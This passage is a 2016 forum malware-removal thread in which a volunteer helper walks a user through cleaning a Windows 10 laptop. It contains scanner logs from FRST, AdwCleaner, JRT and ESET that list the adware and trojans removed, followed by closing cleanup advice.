"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{AA44AE25-68B3-45C6-B7D1-06333F50237C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AA44AE25-68B3-45C6-B7D1-06333F50237C}" => key removed successfully
C:\WINDOWS\System32\Tasks\SMW_P => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMW_P" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB85B611-7F3D-4A11-A7EA-5DAC9B9FCCEC} => key not found. 
C:\WINDOWS\System32\Tasks\AGProxyCheck => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AGProxyCheck => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ADD99CD3-D8CD-40A8-935C-68C869A6BCB2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ADD99CD3-D8CD-40A8-935C-68C869A6BCB2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B4B655B9-3E3B-42D6-8EF3-721B1CAC4B75}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B4B655B9-3E3B-42D6-8EF3-721B1CAC4B75}" => key removed successfully
C:\WINDOWS\System32\Tasks\ga7369985773699857 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ga7369985773699857" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B7270AB1-E0AB-41E2-971C-27831D9730D2} => key not found. 
C:\WINDOWS\System32\Tasks\One System Care Task => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Task => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C3BB1E32-5428-4562-8D07-A171B852CB9C} => key not found. 
C:\WINDOWS\System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B} => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7D0C7D47-7A0E-7E79-0A11-087E790A110B} => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FD468177-984E-4514-B2CE-7B86E83EF36F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FD468177-984E-4514-B2CE-7B86E83EF36F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
C:\WINDOWS\Tasks\System HealerPeriod.job => not found.
C:\WINDOWS\Tasks\System HealerStartUp.job => not found.
C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job => not found.
C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job => not found.
C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Shortcut argument removed successfully.
C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk => Shortcut argument removed successfully.
C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk => Shortcut argument removed successfully.
C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk => not found.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Shortcut argument removed successfully.
C:\Users\Public\Desktop\Google Chrome.lnk => Shortcut argument removed successfully.
C:\WINDOWS\TEMP\Jxwh7jTdDh8tytSaP => moved successfully
C:\ProgramData\Temp => ":972E3A44" ADS removed successfully.
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\exefile" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\.exe" => key removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0CFEF3A1-D62E-4242-BA17-47AFEC0E9CFE} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CE917A65-979C-4094-9A27-546C03A0F0B4} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\FirewallRules: [{70CB83FD-6AD0-4679-BD8F-A7D29BD02E90}] => value not found.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\FirewallRules: [{4ABBB1A8-3F3A-42F2-AFD1-8A812FD3A3E2}] => value not found.
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 1183893 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 79733461 B
Java, Flash, Steam htmlcache => 31886199 B
Windows/system/drivers => 38319541 B
Edge => 118022254 B
Chrome => 100101608 B
Firefox => 18808434 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 194669 B
NetworkService => 51592 B
Robert G => 193568184 B
 
RecycleBin => 23648753414 B
EmptyTemp: => 22.6 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 10:13:08 ====


#5 Oh My!


Posted 28 December 2016 - 02:00 PM

Greetings,

Yes, we took a big bite out of things. Don't worry about the 2 programs you didn't find.

Please do these things.

===================================================

Malwarebytes AdwCleaner

-------------------
  • Please download AdwCleaner and save it on your desktop.
  • Close all open programs and internet browsers
  • Double click on AdwCleaner.exe, click Run, then select I agree if it appears
  • Click Scan
  • Once the scan has completed, if threats are found you will see "Found 3 threats" or something similar above the progress bar
  • Click each tab under Results and uncheck any items you want to keep
  • Click on Clean
  • Confirm the cleaning and rebooting of your computer by clicking OK
  • Click OK twice to finish the removal process by automatically rebooting your computer
  • Once completed an AdwCleaner document will open on your desktop
  • Copy and paste the contents in your reply
===================================================

Malwarebytes Junkware Removal Tool

-------------------
  • Please download Junkware Removal Tool and save it to your desktop.
  • Right-mouse click JRT.exe and select Run as administrator (Windows XP double click the icon)
  • Once completed a JRT.txt document will open on your desktop
  • Copy and paste the contents in your reply
===================================================

ESET Online Scanner

--------------------

I'd like us to scan your machine with ESET OnlineScan. This process may take several hours; that is normal.
  • Download esetsmartinstaller_enu.exe and save it to your Desktop
  • Double click the icon
  • Check YES, I accept the Terms of Use
  • Click the Start button
  • Accept any security warnings from your browser
  • Click Advanced settings
  • Check the following items
      • Enable detection of potentially unwanted applications
      • Remove found threats
      • Scan archives
      • Scan for potentially unsafe applications
      • Enable Anti-Stealth technology

  • Click Start
  • ESET will then download updates and begin scanning your computer
  • If no threats are found simply click Uninstall application on close and hit Finish
  • If threats are found click List of found threats
  • Click Export to text file
  • Save the file on your Desktop as ESET.txt
  • Click Back
  • Review the list of entries and if there are any you want to keep stop and copy/paste the ESET.txt report in your reply for my review
  • If you do not wish to keep any of the entries check Uninstall application on close and Delete quarantined files
  • Click Finish
  • Close the ESET Online Scanner window
  • Copy and paste the contents of ESET.txt in your reply
===================================================

screen317's Security Check

--------------------
  • Please download screen317's Security Check to your desktop
  • Double-click icon to launch the program
  • Click OK
  • Select Run. Note: If you receive an error message saying UNSUPPORTED OPERATING SYSTEM! ABORTED!, reboot your computer and attempt to run it again
  • Allow the program to run
  • A Notepad document will open on your desktop. Please copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
  • AdwCleaner log
  • Junkware log
  • ESET log
  • Security Check log
  • How is your computer running?

Gary
 

#6 billiam864


Posted 28 December 2016 - 10:40 PM

I ran the 4 scans as requested. Clearly found plenty of malware. Logs are below.

 

Again I can notice improvement in my cpu's speed. I haven't noticed any continuing issues popup wise. Happy to run additional checks to be thorough, but I appreciate the fast improvement already.

 

 

# AdwCleaner v6.041 - Logfile created 28/12/2016 at 13:18:51
# Updated on 16/12/2016 by Malwarebytes
# Database : 2016-12-26.3 [Server]
# Operating System : Windows 10 Home  (X64)
# Username : Robert G - LENOVOLAPTOP
# Running from : C:\Users\Robert G\Desktop\AdwCleaner.exe
# Mode: Clean
 
 
 
***** [ Services ] *****
 
[-] Service deleted: dofumimy
[-] Service deleted: SMUpd
 
 
***** [ Folders ] *****
 
[-] Folder deleted: C:\WINDOWS\SysWoW64\config\systemprofile\AppData\Roaming\System Healer
[-] Folder deleted: C:\WINDOWS\SysWoW64\config\systemprofile\AppData\Roaming\BandwidthStat
[-] Folder deleted: C:\WINDOWS\SysWoW64\config\systemprofile\AppData\Local\Shortcut Installer
 
 
***** [ Files ] *****
 
[-] File deleted: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk
 
 
***** [ DLL ] *****
 
 
 
***** [ WMI ] *****
 
 
 
***** [ Shortcuts ] *****
 
[-] Shortcut disinfected: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
 
 
***** [ Scheduled Tasks ] *****
 
 
 
***** [ Registry ] *****
 
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\ProntSpooler
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\ProntSpooler
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WindowService
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WindowService
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[-] Key deleted: HKU\.DEFAULT\Software\System Healer
[-] Key deleted: HKU\.DEFAULT\Software\BandwidthStat
[-] Key deleted: HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\BandwidthStat
[-] Key deleted: HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Interstatnogui
[-] Key deleted: HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\MICROSOFT\wewewe
[#] Key deleted on reboot: HKU\S-1-5-18\Software\System Healer
[#] Key deleted on reboot: HKU\S-1-5-18\Software\BandwidthStat
[#] Key deleted on reboot: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Uninstall\BandwidthStat
[#] Key deleted on reboot: HKCU\Software\Interstatnogui
[#] Key deleted on reboot: HKCU\Software\MICROSOFT\wewewe
[-] Key deleted: HKLM\SOFTWARE\mybeesearch
[-] Key deleted: HKLM\SOFTWARE\SearchModule
[-] Key deleted: HKLM\SOFTWARE\IDOT
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[#] Key deleted on reboot: [x64] HKCU\Software\Interstatnogui
[#] Key deleted on reboot: [x64] HKCU\Software\MICROSOFT\wewewe
[-] Key deleted: [x64] HKLM\SOFTWARE\SearchModule
[-] Key deleted: [x64] HKLM\SOFTWARE\IDOT
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{04015ed4-ea75-40e6-95eb-40c41cca3c54} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{198a094c-b9b6-11e6-8989-806e6f6e6963} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{41d9c6ca-c4d3-4ab9-bc0e-a843a9ce1270} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8a447089-47e9-4d06-9914-cb80e19b8782} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{c31e8efe-f610-458b-9262-a9397c5775b0} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{cba8f7e0-c5c0-4237-af70-beb3dc430bd6} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{f63de64d-56e2-4032-a978-5f473c40b621} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{ff91af18-7468-4914-8197-16431e9a0fa0} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{04015ed4-ea75-40e6-95eb-40c41cca3c54} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{198a094c-b9b6-11e6-8989-806e6f6e6963} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{41d9c6ca-c4d3-4ab9-bc0e-a843a9ce1270} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8a447089-47e9-4d06-9914-cb80e19b8782} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{c31e8efe-f610-458b-9262-a9397c5775b0} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{cba8f7e0-c5c0-4237-af70-beb3dc430bd6} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{f63de64d-56e2-4032-a978-5f473c40b621} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{ff91af18-7468-4914-8197-16431e9a0fa0} [NameServer] 
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\bestpriceninja.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cmptch.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\coupontime.co
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\govids.net
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nowuseeitplayer.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nps.pastaleads.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pastaleads.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pstatic.bestpriceninja.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.cmptch.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.coupontime00.coupontime.co
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ui.nowuseeitplayer.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www.govids.net
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\bestpriceninja.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\coupontime.co
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\nps.pastaleads.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pastaleads.com
 
 
***** [ Web browsers ] *****
 
 
 
*************************
 
:: "Tracing" keys deleted
:: Winsock settings cleared
 
*************************
 
C:\AdwCleaner\AdwCleaner[C0].txt - [19752 Bytes] - [28/12/2016 13:18:51]
C:\AdwCleaner\AdwCleaner[S0].txt - [19247 Bytes] - [28/12/2016 13:17:29]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [19900 Bytes] ##########
 
 
 
 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.0 (12.05.2016)
Operating System: Windows 10 Home x64 
Ran by Robert G (Administrator) on Wed 12/28/2016 at 13:23:20.60
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 3 
 
Successfully deleted: C:\Users\Robert G\AppData\Roaming\new version available (Folder) 
Successfully deleted: C:\WINDOWS\wininit.ini (File) 
Successfully deleted: C:\Users\Robert G\desktop\Continue Last version Installation.lnk (File) 
 
 
 
Registry: 1 
 
Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_9868320E49253A0128EE64E2725BFE91 (Registry Value) 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 12/28/2016 at 13:27:25.76
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 

C:\AdwCleaner\quarantine\files\ggfimkhlvauieuzfsteewtmxldmzxvke\bandwidthstat.exe a variant of Win32/Techsnab.AG potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\xpack1221_US.1482324322.exe.xBAD multiple threats cleaned by deleting
C:\FRST\Quarantine\C\Program Files\0DA5GV0SMZ\0DA5GV0SM.exe a variant of MSIL/Adware.CsdiMonetize.E application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\1OZOH9DOKF\8RNAHD98E.exe a variant of MSIL/Adware.CsdiMonetize.E application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\AE5AV44CD6\AE5AV44CD.exe a variant of MSIL/Adware.CsdiMonetize.E application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\smci32.dll a variant of Win32/SpeedBit.AS potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\smci64.dll a variant of Win64/SBWatchman.A potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\smi32.exe a variant of Win32/SpeedBit.AU potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\smu.exe a variant of Win64/SBWatchman.A potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\SMUninstall.exe a variant of Win32/SBWatchman.K potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\smw.sys a variant of Win64/SpeedBit.D potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files (x86)\Disenfranchise\fluctuations.exe a variant of MSIL/Adware.Dotdo.AP application cleaned by deleting
C:\FRST\Quarantine\C\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE\kns82E3.tmp a variant of Win32/Adware.ConvertAd.AJI application cleaned by deleting
C:\FRST\Quarantine\C\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE\Uninstall.exe a variant of Win32/Adware.ConvertAd.AJQ.gen application cleaned by deleting
C:\FRST\Quarantine\C\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE\vnso7410.tmp a variant of Win32/Adware.ConvertAd.AJQ.gen application cleaned by deleting
C:\FRST\Quarantine\C\Program Files (x86)\Ovals\fluctuations.exe a variant of MSIL/Adware.Dotdo.AP application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\fluctuations.exe.xBAD a variant of MSIL/Adware.Dotdo.AP application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\slisdo.dll.xBAD a variant of Win32/TrojanProxy.Agent.OAL trojan cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\Temp\12C5.tmp.exe.xBAD a variant of Win32/InstallCore.ANV potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\Temp\B4E9.tmp.exe.xBAD a variant of Win32/InstallCore.ANV potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\Temp\ICReinstall_B4E9.tmp.exe.xBAD a variant of Win32/InstallCore.ANV potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\Temp\sdf6733.exe.xBAD a variant of MSIL/Adware.Imali.C application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\Interstatnogui\interstatnogui.exe a variant of Win32/Techsnab.AG potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\JucdiJhnoz\Aiosoukn.din a variant of Win32/Adware.PennyBee.AH application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\JucdiJhnoz\Rawei.exe a variant of Win32/TrojanDropper.Addrop.AI trojan cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\Xeeedxi\Nenlaak.dll a variant of Win32/TrojanDropper.Addrop.AI trojan cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\Xeeedxi\Nenlaak.exe a variant of Win32/TrojanDropper.Addrop.AI trojan cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\Xeeedxi\Xeeedxi.exe a variant of Win32/Adware.PennyBee.AH application cleaned by deleting
C:\FRST\Quarantine\C\Windows\4b15ad0c9aba0f5f34b9d34c5ca543e0.exe.xBAD a variant of Win32/Packed.NSISmod.AE suspicious application cleaned by deleting
C:\FRST\Quarantine\C\Windows\System32\BITBBD7.tmp.xBAD a variant of Win32/SpeedBit.BE potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Windows\System32\BITDFC5.tmp.xBAD a variant of Win32/SpeedBit.BE potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Windows\System32\drivers\cherimoya.sys.xBAD a variant of Win64/NetFilter.A potentially unsafe application cleaned by deleting
C:\FRST\Quarantine\C\Windows\SysWOW64\SendRequest Error.xBAD multiple threats cleaned by deleting
C:\FRST\Quarantine\C\Windows\Temp\set_xVQSGNGL.exe.xBAD a variant of Win32/DownloadAdmin.W potentially unwanted application cleaned by deleting
C:\Program Files (x86)\Intel\MVckHWN7ffyT\updater.exe MSIL/TrojanDownloader.Adload.BC trojan cleaned by deleting
C:\Users\Robert G\Documents\Downloads\CuteWriter.exe a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application deleted
C:\Users\Robert G\Documents\Downloads\media.player.codec.pack.v4.2.3.setup.exe a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted
C:\Users\Robert G\Documents\Downloads\TopckitSetup0A.exe a variant of Win32/Adware.Topckit application cleaned by deleting
C:\Windows\Installer\bd885c.msi a variant of Win32/Verti.U potentially unwanted application deleted
 
 
 

 Results of screen317's Security Check version 1.014 --- 12/23/15  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Windows Defender   
 WMI entry may not exist for antivirus; attempting automatic update. 
`````````Anti-malware/Other Utilities Check:````````` 
 Adobe Flash Player 24.0.0.186  
 Google Chrome (55.0.2883.87) 
 Google Chrome (SetupMetrics...) 
````````Process Check: objlist.exe by Laurent````````  
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 
 
 


#7 Oh My!

Posted 29 December 2016 - 09:47 AM

Things are looking great. Do you have any remaining concerns before I provide some closing information?
Gary
 

#8 billiam864

Posted 29 December 2016 - 11:11 AM

No remaining concerns so far. I'll try to continue testing out the computer today.



#9 Oh My!

Posted 29 December 2016 - 08:21 PM

Very good.

Now that your computer is running well it is my great pleasure to proclaim to you the Good News!

===================================================

All Clean!

--------------

Your machine appears to be clean and we will now remove the tools used and logs created during our steps. Please do this.

===================================================

Delfix by Xplode

--------------------
  • Download Delfix and save it to your Desktop
  • Double click the icon
  • Place checkmarks in:
      • Remove disinfection tools
      • Create registry backup
      • Purge system restore
  • Click Run

===================================================

You may delete any additional programs or logs on your computer which were not automatically removed by Delfix. Simply delete the log files or desktop icons. If we used Emsisoft Emergency Kit just delete the icon on your desktop and the C:\EEK folder.

Please take the time to read below on how to secure the machine and take the necessary steps to keep it clean.

Lawrence Abrams, the founder of BleepingComputer.com, has developed an excellent tutorial which will provide you with the information you need to know to keep your computer secure and clean. Please take the time to read:

In addition, here are some more links you might find of interest:

Thank you for placing your trust in BleepingComputer. It was a pleasure serving you.
Gary
 

#10 Oh My!

Posted 30 December 2016 - 05:21 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Gary
 